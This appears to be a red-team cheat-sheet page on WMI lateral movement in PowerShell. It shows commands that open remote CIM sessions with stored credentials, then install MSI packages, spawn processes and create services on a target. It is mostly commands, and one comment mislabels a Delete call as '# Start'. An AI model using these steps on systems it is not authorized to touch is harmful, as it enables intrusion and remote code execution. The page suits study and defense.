WMI
Administrators
Windows Management Instrumentation
(WMI) is Windows implementation of Web-Based Enterprise Management (WBEM), an enterprise standard for accessing management Information across devices. WMI allows Administrators to perform Standard Management Tasks that Attackers can abuse to perform Lateral Movement.
Connecting to WMI From Powershell
Before being able to connect to WMI
using Powershell Commands, we need to create a PSCredential Object with our User and Password. We can store this Object in the $credential
Variable.
$username = 'USERNAME';
$password = 'PASSWORD';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
We can then proceed to establish a WMI Session using one of the Protocols DCOM - WSMAN
.
DCOM:
RPC over IP will be used for Connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCPWSMAN:
WinRM will be used for connecting to WMI. This protocol uses ports5985/TCP
(WinRM HTTP) or5986/TCP
(WinRM HTTPS)
- DCOM
- WSMAN
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
$Opt = New-CimSessionOption -Protocol WSMAN
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
Installing MSI Packages
Invoke-CimMethod
MSI
is a file format used for Installers. If we can copy an MSI Package to the Target System, we can then use WMI to attempt to install it for us. Once the MSI file is in the Target System, we can attempt to Install it by invoking the Win32_Product
class through WMI.
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\INSTALLER.msi"; Options = ""; AllUsers = $false}
Remote Process Creation
Invoke-CimMethod
We can Remotely Spawn a Process from Powershell by leveraging Windows Management Instrumentation (WMI) sending a WMI request to the Win32_Process class to Spawn the Process under the WMI Session
.
$Command = "Command To Run";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
Remote Service Creation
Invoke-CimMethod
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "ServiceName";
DisplayName = "ServiceName";
PathName = "Command To Run";
ServiceType = [byte]::Parse("16");
StartMode = "Manual"
}
# Run
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'ServiceName'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
# Stop
Invoke-CimMethod -InputObject $Service -MethodName StopService
# Start
Invoke-CimMethod -InputObject $Service -MethodName Delete